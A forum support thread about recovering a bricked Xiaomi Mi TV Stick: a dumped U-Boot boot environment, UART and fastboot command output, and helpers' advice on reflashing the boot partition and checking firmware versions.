outputmode=576cvbs
page_trace=on
preboot=run cmdline_keys;run bcb_cmd; run factory_reset_poweroff_protect;run upgrade_check;run init_display;run storeargs;bcb uboot-command;run switch_bootmode;
reboot_mode=cold_boot
reboot_mode_android=normal
recovery_from_flash=get_valid_slot;echo active_slot: ${active_slot};if test ${active_slot} = normal; then setenv bootargs ${bootargs} aml_dt=${aml_dt} recovery_part={recovery_part} recovery_offset={recovery_offset};if itest ${upgrade_step} == 3; then if ext4load mmc 1:2 ${dtb_mem_addr} /recovery/dtb.img; then echo cache dtb.img loaded; fi;if ext4load mmc 1:2 ${loadaddr} /recovery/recovery.img; then echo cache recovery.img loaded; wipeisb; bootm ${loadaddr}; fi;else fi;if imgread kernel ${recovery_part} ${loadaddr} ${recovery_offset}; then wipeisb; bootm ${loadaddr}; fi;else setenv bootargs ${bootargs} aml_dt=${aml_dt} recovery_part=${boot_part} recovery_offset=${recovery_offset};if imgread kernel ${boot_part} ${loadaddr}; then bootm ${loadaddr}; fi;fi;
recovery_from_udisk=setenv bootargs ${bootargs} aml_dt=${aml_dt} recovery_part={recovery_part} recovery_offset={recovery_offset};if fatload usb 0 ${loadaddr} aml_autoscript; then autoscr ${loadaddr}; fi;if fatload usb 0 ${loadaddr} recovery.img; then if fatload usb 0 ${dtb_mem_addr} dtb.img; then echo udisk dtb.img loaded; fi;wipeisb; bootm ${loadaddr};fi;
recovery_offset=0
recovery_part=recovery
region=none
rpmb_state=0
sdc_burning=sdc_burn ${sdcburncfg}
sdcburncfg=aml_sdc_burn.ini
serialno=26919800002433906
sn2=3236393139383030303032343333393036
stderr=serial
stdin=serial
stdout=serial
storeargs=get_rebootmode;setenv bootargs ${initargs} ${fs_type} reboot_mode_android=${reboot_mode_android} androidboot.selinux=${EnableSelinux} logo=${display_layer},loaded,${fb_addr},${outputmode} maxcpus=${maxcpus} vout=${outputmode},enable hdmimode=${hdmimode} frac_rate_policy=${frac_rate_policy} cvbsmode=${cvbsmode} hdmitx=${cecconfig},${colorattribute} cvbsdrv=${cvbs_drv} androidboot.firstboot=${firstboot} jtag=${jtag}; setenv bootargs ${bootargs} androidboot.veritymode=enforcing androidboot.hardware=amlogic androidboot.btmacaddr=${btmac} androidboot.wifimac=${wifimac} androidboot.wificountrycode=${wifi_ccode} androidboot.bootloader=${bootloader} androidboot.serialno=${serialno} androidboot.boardid=${boardid} androidboot.region=${region} androidboot.reboot_mode=${reboot_mode};setenv bootargs ${bootargs} page_trace=${page_trace};setenv bootargs ${bootargs} androidboot.rpmb_state=${rpmb_state};
storeboot=get_system_as_root_mode;echo system_mode: ${system_mode};if test ${system_mode} = 1; then setenv fs_type ro rootwait skip_initramfs;run storeargs;fi;get_valid_slot;get_avb_mode;echo active_slot: ${active_slot} avb2: ${avb2};if test ${active_slot} != normal; then setenv bootargs ${bootargs} androidboot.slot_suffix=${active_slot};fi;if test ${avb2} = 0; then if test ${active_slot} = _a; then setenv bootargs ${bootargs} root=/dev/mmcblk0p23;else if test ${active_slot} = _b; then setenv bootargs ${bootargs} root=/dev/mmcblk0p24;fi;fi;fi;if imgread kernel ${boot_part} ${loadaddr}; then bootm ${loadaddr}; fi;run update;
switch_bootmode=get_rebootmode;if test ${reboot_mode} = factory_reset; then setenv reboot_mode_android normal;run storeargs;run recovery_from_flash;else if test ${reboot_mode} = update; then setenv reboot_mode_android normal;run storeargs;run update;else if test ${reboot_mode} = quiescent; then setenv reboot_mode_android quiescent;run storeargs;setenv bootargs ${bootargs} androidboot.quiescent=1;else if test ${reboot_mode} = recovery_quiescent; then setenv reboot_mode_android quiescent;run storeargs;setenv bootargs ${bootargs} androidboot.quiescent=1;run recovery_from_flash;else if test ${reboot_mode} = cold_boot; then setenv reboot_mode_android normal;run storeargs;else if test ${reboot_mode} = fastboot; then setenv reboot_mode_android normal;run storeargs;fastboot;fi;fi;fi;fi;fi;fi;if monitor_bt_cmdline; then run update; fi;
system_mode=1
try_auto_burn=update 700 750;
update=run try_auto_burn; if usb start 0; then run recovery_from_udisk;fi;run recovery_from_flash;
upgrade_check=echo upgrade_step=${upgrade_step}; if itest ${upgrade_step} == 3; then run init_display; run storeargs; run update;else fi;
upgrade_step=2
usb_burning=update 1000
wifi_ccode=US
wifimac=00:00:00:00:00:00
wipe_cache=successful
wipe_data=successful
Environment size: 7334/65532 bytes
I'm not sure if imgread is being called by the normal boot process, or a recovery process because the device failed to boot.
At the uart prompt type:
imgread dtb boot 0x1000000
imgread kernel boot 0x1080000
bootm 0x1080000
and post the output.
If it's the same error as before, the boot partition might not be flashed with the correct image.
gxl_aquaman_v1#imgread dtb boot 0x1000000
Err imgread(L220):Fmt unsupported! only support 0x3
gxl_aquaman_v1#imgread kernel boot 0x1080000
Err imgread(L328):Fmt unsupported!genFmt 0x0 != 0x3
gxl_aquaman_v1#imgread kernel boot 0x1080000
Err imgread(L328):Fmt unsupported!genFmt 0x0 != 0x3
gxl_aquaman_v1#<INTERRUPT>
gxl_aquaman_v1#bootm 0x1080000
aml log : Sig Check 1830
kedzior.kedzior said:
gxl_aquaman_v1#imgread dtb boot 0x1000000
Err imgread(L220):Fmt unsupported! only support 0x3
Click to expand...
Click to collapse
Are you able to flash the boot partition with the boot image again?
Which version of the firmware did you flash?
Are you able to flash the boot partition with the boot image again?
Yes
Which version of the firmware did you flash?
https://disk.yandex.ru/d/aL5XolrdAbTJ0g How to check it?
Other than this one I have no other
Did you flash it with fastboot or burn mode?
According to the instructions from the post https://forum.xda-developers.com/t/help-please-mdz-24-aa-no-power-led-no-video.4452819/post-87044521
but one of the commands "fastboot oem unlock" not working
"astboot flashing unlock" worked
"fastboot flashing unlock_critical" worked
I notice from the environment that the bootloader is currently locked.
The russian guy in the video mentioned that it is important to keep the older version of the bootloader, because the newer version could lock you out.
What I would try is starting fastboot, and then using the ota source files, flashing all of the partitions again, except NOT the bootloader.
What you could try first is just flashing the boot partition again from whatever firmware you used the last time.
Unfortunately, I do not have the previous works version :/
kedzior.kedzior said:
https://disk.yandex.ru/d/aL5XolrdAbTJ0g How to check it?
Click to expand...
Click to collapse
I will check that version, and will also check which version is the newest version.
At the uart prompt, type:
get_bootloaderversion
and post the version.
Functioner said:
At the uart prompt, type:
get_bootloaderversion
and post the version.
Click to expand...
Click to collapse
gxl_aquaman_v1#get_bootloaderversion
Nieznane polecenie 'get_bootloaderversion' - spróbuj 'help'
C:\adb>fastboot getvar version-bootloader
version-bootloader: U-Boot 2015.01-g2e3e77d-dirty
Finished. Total time: 0.003s
The version of the firmware in backup-Restore.rar from the above yandex link is r293:
Xiaomi/aquaman/aquaman:9/PI/293:user/release-keys
This is quite old. It's from May 26 2020.
If you flashed the tee image from that download, it could have corrupted your device.
thank you very much for your help and your time. I will continue to try to bring my stick back to life
kedzior.kedzior said:
thank you very much for your help and your time. I will continue to try to bring my stick back to life
Click to expand...
Click to collapse
sure, good luck.

Categories

Resources